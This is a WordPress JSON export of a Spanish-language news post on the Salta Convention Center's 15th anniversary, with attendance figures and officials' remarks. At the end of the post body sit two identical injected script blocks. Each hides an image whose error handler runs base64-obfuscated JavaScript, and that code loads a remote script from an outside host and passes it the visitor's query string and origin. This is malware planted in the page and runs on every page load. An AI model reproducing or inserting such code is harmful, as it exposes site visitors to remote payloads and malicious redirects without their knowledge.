{"id":1293,"date":"2022-08-12T22:27:19","date_gmt":"2022-08-13T01:27:19","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1293"},"modified":"2025-08-14T00:38:39","modified_gmt":"2025-08-14T03:38:39","slug":"el-centro-de-convenciones-salta-en-15-anos-recibio-mas-de-2-millones-de-visitantes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1293","title":{"rendered":"El Centro de Convenciones Salta en 15 a\u00f1os recibi\u00f3 m\u00e1s de 2 millones de visitantes"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#b00832\"><strong><em>Es una infraestructura clave para que la provincia sea uno de los destinos l\u00edderes en turismo de reuniones.<\/em><\/strong><\/h4>\n\n\n\n<p>El turismo vinculado a la organizaci\u00f3n de congresos, exposiciones, encuentros y eventos afines necesita para su funcionamiento infraestructura acorde que potencie una actividad generadora de ingresos que cuadruplica al turismo convencional. Es la principal caracter\u00edstica del Centro de Convenciones Salta que en sus 15 a\u00f1os apuesta a seguir creciendo en servicios.<\/p>\n\n\n\n<p>Justamente este lugar reuni\u00f3 anoche a representantes p\u00fablicos y privados con motivo de una gala en honor en la que se recordaron los or\u00edgenes, el presente y el futuro del Centro de Convenciones, un socio estrat\u00e9gico para que el destino Salta sea l\u00edder en turismo de reuniones.<\/p>\n\n\n\n<p>La presidenta del Centro de Convenciones Salta, Andrea Pieve, inform\u00f3 que desde su inauguraci\u00f3n con m\u00e1s de 850 eventos recibi\u00f3 una cifra superior a los 2 millones de visitantes, con un freno en 2020 producto de la pandemia donde la actividad fue casi nula; adem\u00e1s el CCS fue adaptado para funcionar como un centro hospitalario. En marzo de 2022 abri\u00f3 sus puertas nuevamente como un lugar de encuentros: en cinco meses se realizaron 53 eventos con m\u00e1s de 110 mil asistentes.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes Mario Pe\u00f1a felicit\u00f3 al equipo que trabaja en el Centro de Convenciones en su aniversario. \u201cFueron 15 a\u00f1os llenos de historias y experiencias que nos dejaron m\u00e1s de 2 millones de asistentes\u201d, se\u00f1al\u00f3 el funcionario, destacando lo que significa el turismo de reuniones para la industria.<\/p>\n\n\n\n<p>Por otra parte record\u00f3 la visi\u00f3n federal del gobernador Gustavo S\u00e1enz de incrementar la infraestructura con la construcci\u00f3n del Centro de Convenciones en Cafayate, que potenciar\u00e1 la actividad en la Ruta del Vino.<\/p>\n\n\n\n<p>Tambi\u00e9n particip\u00f3 la intendenta de la ciudad de Salta Bettina Romero quien celebr\u00f3 el esfuerzo de la Provincia en poner en valor el Centro de Convenciones tras la pandemia.<\/p>\n\n\n\n<p>Por su parte la presidenta de Asociaci\u00f3n Argentina de Organizadores y Proveedores de Exposiciones, Congresos, Eventos y Bur\u00f3s de Convenciones, Patricia Dur\u00e1n Vaca indic\u00f3 que \u201cSalta es un destino que brilla por la sinergia entre el sector p\u00fablico y privado\u201d, sobre el CCS opin\u00f3 que \u201cel profesionalismo en este centro est\u00e1 m\u00e1s que visto, han pasado eventos de todas las l\u00edneas y caracter\u00edsticas en estos 15 a\u00f1os\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3738-foto-de-archivo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3738-foto-de-archivo.jpg\" alt=\"Foto de Archivo\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3739-foto-de-archivo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3739-foto-de-archivo.jpg\" alt=\"Foto de Archivo\"\/><\/a><\/figure>\n\n\n\n<p>En este sentido, el presidente del Salta Convention Bureau, Daniel Astorga, &nbsp;se refiri\u00f3 al trabajo articulado con el Ministerio de Turismo y Deportes que permite ser l\u00edderes en turismo de reuniones en el pa\u00eds, destacando las infinitas posibilidades que brinda el Centro de Convenciones.<\/p>\n\n\n\n<p>A la Gala tambi\u00e9n asisti\u00f3 la esposa del Gobernador de la Provincia Elena Cornejo, el secretario de Cultura Diego Ashur Mas, el presidente de la C\u00e1mara de Turismo de Salta, Gustavo Di M\u00e9cola, la presidenta de AHT Mariana Farjat, el presidente de la C\u00e1mara Gastron\u00f3mica Juan Lucero, el subsecretario de Competitividad Tur\u00edstica Alejandro Cha, el presidente del Tren a las Nubes Sebasti\u00e1n Vidal y el presidente del Telef\u00e9rico San Bernardo Mart\u00edn Miranda, la directora ejecutiva del Inprotur Salta Mar\u00eda Eugenia Cornejo. Tambi\u00e9n participaron legisladores provinciales y municipales.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-centro-de-convenciones-salta-en-15-anios-recibio-mas-de-2-millones-de-visitantes-84226\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Es una infraestructura clave para que la provincia sea uno de los destinos l\u00edderes en turismo de reuniones. El turismo vinculado a la organizaci\u00f3n de congresos, exposiciones, encuentros y eventos afines necesita para su funcionamiento infraestructura acorde que potencie una actividad generadora de ingresos que cuadruplica al turismo convencional. Es la principal caracter\u00edstica del Centro [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1294,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20,16],"tags":[],"class_list":{"0":"post-1293","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1293"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1293"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1293\/revisions"}],"predecessor-version":[{"id":7396,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1293\/revisions\/7396"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1294"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}